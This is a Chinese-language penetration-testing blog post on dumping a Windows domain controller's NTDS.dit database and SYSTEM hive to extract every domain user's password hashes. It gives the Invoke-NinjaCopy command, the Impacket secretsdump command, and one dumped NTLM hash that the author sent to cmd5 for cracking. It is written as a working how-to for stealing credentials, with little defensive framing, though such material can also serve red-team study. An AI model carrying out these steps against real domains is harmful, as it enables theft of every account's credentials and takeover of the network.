从NTDS.dit文件提取Hash&Password

NTDS.dit

NTDS.dit是域控的数据库文件

Impacket-secretsdump

secretsdump.py : 远程dump hash

使用DL_DRSGetNCChanges() 方法dump hash,明文,keberos密钥,还可以通过smbexec/wmiexec执行vssadmin方法dump NTDS.dit.

-w820

直接复制是出不来的,因为这个文件DC正在使用,需要使用工具复制出来,一般来说复制卷影就行,我嫌麻烦,找了个脚本.

https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1
Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination "c:\windows\temp\ntds.dit"

-w855

-w681

还需要一个SYSTEM hive文件

hive,指的是Windows注册表HIVE文件。

如法炮制,复制之后.使用impacket工具包解密.

sudo python secretsdump.py -ntds Wing/ntds.dit -system Wing/SYSTEM LOCAL

-w1010
把hash扔到cmd5去破解

518b98ad4178a53695dc997aa02d455c:

-w983
-w1046
憨憨cmd5,这都收费.

这个方法还是可以的,把域内所有人员hash全脱了.

提取的法子一大堆.
参考:
https://www.hackingarticles.in/3-ways-extract-password-hashes-from-ntds-dit/


文章作者: Wing
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Wing !
评论
 上一篇
DLL注入&DLL劫持 DLL注入&DLL劫持
DLL注入&DLL劫持 DLL注入DLL注入是在某个进程的地址空间的上下文中运行任意代码,如果进程是高权限,攻击者可以利用这个特性提权. 通常需要以下几个步骤: DLL需要放置在目标环境中 CreateRemoteThread调
2019-12-30
下一篇 
Pentesting备忘录[随时更新] Pentesting备忘录[随时更新]
PentestingEnumerationGeneral EnumerationVerbose, syn, all ports, all scripts, no ping nmap -vv -Pn -A -sC -sS -T 4 -p-
2019-12-11
  目录